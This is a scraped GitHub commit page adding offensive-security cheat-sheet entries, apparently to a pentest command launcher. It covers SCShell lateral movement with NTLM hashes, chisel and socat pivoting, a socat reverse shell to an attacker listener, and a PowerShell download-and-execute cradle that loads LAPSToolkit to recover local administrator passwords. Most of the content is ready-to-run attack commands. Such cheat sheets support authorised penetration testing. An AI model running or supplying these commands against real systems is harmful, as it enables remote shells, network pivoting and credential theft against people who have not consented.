-
Notifications
You must be signed in to change notification settings - Fork 461
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
18 changed files
with
373 additions
and
12 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
# SCShell | ||
|
||
% SCShell, psexec, sealthy, DCERPC | ||
|
||
## stealty psexec | ||
#plateform/linux #target/remote #cat/ATTACK/CONNECT | ||
|
||
no service created, no smb used, no file droped | ||
https://github.com/Mr-Un1k0d3r/SCShell | ||
|
||
``` | ||
python3 scshell.py -service-name <service-name|defragsvc> -hashes :<ntlm-hash> <domain>/<user>@<ip> | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
# chisel | ||
|
||
% chisel | ||
|
||
## chisel server (server on local machine) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
All commands on arsenal are done with server on kali machine and client on the target. | ||
Client or Server can also be launch on windows with chisel.exe | ||
``` | ||
./chisel server -v -p <server_port|8000> --reverse | ||
``` | ||
|
||
## chisel reverse port forwarding (client on remote machine) - forward client port on server | ||
#plateform/linux #target/remote #cat/PIVOT | ||
|
||
This forward {clientside-host}:{clientside-port} to server {local-port} | ||
To get the port of the client machine locally on serverside. | ||
ex: R:2222:localhost:22 to get the client 22 (ssh) on the port 2222 of the server | ||
| server | - 2222 <----- |client|-127.0.0.1:22 | ||
on server : ssh -p 2222 127.0.0.1 | ||
|
||
``` | ||
./chisel client -v <server_ip>:<server_port|8000> R:<serverside-port>:<clientside-host|localhost>:<clientside-port> | ||
``` | ||
|
||
## chisel remote port forwarding (client on remote machine) - forward server port on client | ||
#plateform/linux #target/remote #cat/PIVOT | ||
|
||
To expose server port remotely (usefull to expose your listener) | ||
This forward {serverside-host}:{serverside-port} from the server to {clientside-host}:{clientside-port} | ||
ex : 0.0.0.0:4445:127.0.0.1:4444 expose the server 4444 listener to client 4445 | ||
| server | - 4444 -------> |client|-4445 : * <- | ||
|
||
``` | ||
./chisel client -v <server_ip>:<server_port|8000> <clientside-host|0.0.0.0>:<clientside-port>:<serverside-host|127.0.0.1>:<serverside-port> | ||
``` | ||
|
||
## chisel socks proxy (client on remote machine) | ||
#plateform/windows #target/remote #cat/PIVOT | ||
|
||
If the server is launch with --reverse you can specify R: socks to get a proxy socks on server machine (port 1080) | ||
On server with proxychains set on port 1080 you can proxy socks request on the client. | ||
|
||
``` | ||
./chisel client <server_ip>:<server_port> R:socks | ||
``` | ||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# socat | ||
|
||
% socat | ||
|
||
## socat port forwarding listener (on local machine) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
./socat TCP-LISTEN:<port_listener|4444>,fork,reuseaddr TCP-LISTEN:<port_to_forward> | ||
``` | ||
|
||
## socat port forwarding connect (on remote machine) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
./socat TCP:<connect_ip>:<connect_port|4444> TCP:127.0.0.1:<port_to_forward> | ||
``` | ||
|
||
## socat reverse shell (remote victime) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listner_ip>:<listner_port|4444> | ||
``` | ||
|
||
## socat reverse shell listener (local) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
socat file:`tty`,raw,echo=0 tcp-listen:<listner_port|4444> | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
# LAPS | ||
|
||
% LAPS, passwords | ||
|
||
## laps toolkit | ||
#plateform/windows #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER | ||
|
||
https://github.com/leoloobeek/LAPSToolkit | ||
|
||
```powershell | ||
(new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1 | ||
``` | ||
|
||
## laps toolkit - Get laps computer | ||
#plateform/windows #target/remote #cat/RECON | ||
```powershell | ||
Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers | ||
``` | ||
|
||
## laps toolkit - find LAPS Delegated Groups | ||
#plateform/windows #target/remote #cat/RECON | ||
```powershell | ||
Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups | ||
``` | ||
|
||
## laps toolkit - Find users with Extented rights | ||
#plateform/windows #target/remote #cat/RECON | ||
```powershell | ||
Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.